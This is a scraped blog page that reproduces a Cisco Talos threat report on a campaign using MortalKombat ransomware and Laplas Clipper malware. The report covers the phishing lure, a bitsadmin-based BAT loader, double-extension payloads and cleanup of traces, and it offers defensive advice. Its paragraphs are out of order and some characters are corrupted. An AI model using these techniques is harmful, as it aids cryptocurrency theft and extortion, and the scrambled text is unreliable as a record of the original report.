![]() MortalKombat did not show any wiper behavior or delete the volume shadow copies on the victim’s machine. ![]() It drops the ransom note and changes the victim machine’s wallpaper upon the encryption process. Talos observed that MortalKombat encrypts various files on the victim machine’s filesystem, such as system, application, database, backup, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim’s machine. The name of the ransomware and the wallpaper it drops on the victim system are almost certainly a reference to the Mortal Kombat media franchise, which encompasses a series of popular video games and films. MortalKombat is a novel ransomware, first observed by threat researchers in January 2023, with little known about its developers and operating model. Talos observed the threat actor deploying MortalKombat ransomware and Laplas Clipper malware in this campaign, both used to steal cryptocurrency from the victim. MortalKombat and Laplas Clipper payloads deployed to elicit cryptocurrency gains The BAT loader script starts the dropped malware using the Windows start command and deletes the downloaded ZIP file and the dropped payload.īAT loader downloading and executing MortalKombat ransomware.īAT loader downloading and executing Laplas Clipper malware. Using an embedded VB script, the BAT loader script inflates the downloaded malicious ZIP in the “%TEMP%” location and drops a malicious executable file with double file extensions “.PDF.EXE”. The BAT loader script uses the living-off-the-land binary (LoLBin) bitsadmin to download a malicious ZIP file from the attacker-controlled download server to the victim machine’s local user applications temporary folder. Talos observed different attacks in this campaign where the actor used the BAT loader script to download and execute either Laplas Clipper malware or MortalKombat ransomware. BAT loader used to deploy Laplas Clipper malware and MortalKombat ransomware Additionally, the emails have a spoofed sender email, “norepl圜oinPaymentsnet”, and the email subject “net] Payment Timed Out.” A malicious ZIP file is attached with a filename resembling a transaction ID mentioned in the email body, enticing the recipient to unzip the malicious attachment and view the contents, which is a malicious BAT loader. The initial infection vector is a phishing email in which the attackers impersonate CoinPayments, a legitimate global cryptocurrency payment gateway. Infection summary flow diagram.Ĭryptocurrency-themed email lure used as initial infection vector The loader script will run the dropped payload as a process in the victim’s machine, then delete the downloaded and dropped malicious files to clean up the infection markers. When a victim opens the loader script, it downloads another malicious ZIP file from an attacker-controlled hosting server to the victim’s machine, inflates it automatically, and executes the payload, which is either the GO variant of Laplas Clipper malware or MortalKombat ransomware. ![]() The malicious ZIP file attached to the initial phishing email contains a BAT loader script. ![]() Multi-stage attack chain delivers malware or ransomware and removes infection markersĪ typical infection in this campaign begins with a phishing email and kicks off a multi-stage attack chain in which the actor delivers either malware or ransomware, then deletes evidence of malicious files, covering their tracks and challenging analysis. Talos encourages updating computers with the latest security updates, implementing robust endpoint protection solutions with behavioral detection capabilities, and maintaining tested, offline backup solutions for endpoints with a reasonable restoration time in the event of a ransomware attack. Talos recommends that users and organizations be meticulous about the recipient’s wallet address while performing cryptocurrency transactions.Leveraging cryptocurrency offers threat actors attractive benefits such as anonymity, decentralization, and lack of regulation, making it more challenging to track. Talos continues to see attack campaigns targeting individuals, small businesses, and large organizations that aim to steal or demand ransom payments in cryptocurrency.Based on Talos’ analysis of similarities in code, class name, and registry key strings, we assess with high confidence that the MortalKombat ransomware belongs to the Xorist family.Talos observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389, using one of their download servers that run an RDP crawler and also facilitates MortalKombat ransomware.Since December 2022, Cisco Talos has been observing an unidentified actor deploying two relatively new threats, the recently discovered MortalKombat ransomware and a GO variant of the Laplas Clipper malware, to steal cryptocurrency from victims.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |